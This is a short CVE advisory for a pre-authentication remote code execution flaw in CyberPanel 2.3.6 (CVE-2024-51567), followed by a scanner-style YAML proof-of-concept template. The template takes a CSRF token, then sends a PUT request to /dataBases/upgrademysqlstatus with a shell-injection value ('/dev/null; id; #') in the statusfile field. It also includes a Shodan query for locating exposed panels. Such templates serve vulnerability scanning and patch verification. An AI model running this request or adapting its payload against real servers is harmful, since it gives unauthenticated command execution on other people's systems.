upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
PoC代码[已公开]
id: CVE-2024-51567
info:
name: CyberPanel v2.3.6 Pre-Auth Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication controls, allowing them to inject and execute arbitrary commands on the underlying server.
reference:
- https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760
- https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
- https://cwe.mitre.org/data/definitions/420.html
- https://cwe.mitre.org/data/definitions/78.html
- https://cyberpanel.net/KnowledgeBase/home/change-logs/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-51567
cwe-id: CWE-306
epss-score: 0.94261
epss-percentile: 0.99928
cpe: cpe:2.3:a:cyberpanel:cyberpanel:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: cyberpanel
product: cyberpanel
shodan-query: html:"CyberPanel"
tags: cve,cve2024,cyberpanel,rce,intrusive,kev,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
PUT /dataBases/upgrademysqlstatus HTTP/1.1
Host: {{Hostname}}
X-CSRFToken: {{csrftoken}}
Content-Type: application/json
Referer: {{RootURL}}
Cookie: csrftoken={{csrftoken}}
{"statusfile":"/dev/null; id; #","csrftoken":"{{csrftoken}}"}
extractors:
- type: regex
part: header
name: csrftoken
internal: true
group: 1
regex:
- csrftoken=([A-Za-z0-9]+)
matchers-condition: and
matchers:
- type: word
part: body
words:
- "uid="
- "error_message"
- "requestStatus"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100b8bdfe2c540f7ba9799610879fb8dcd4c2f91d7889bfcf25b83034c618b14641022057535c88ffccb006b2b88116da602b357daa4b6a96dc9e5826ebc81c65d23a05:922c64590222798bb761d5b6d8e72950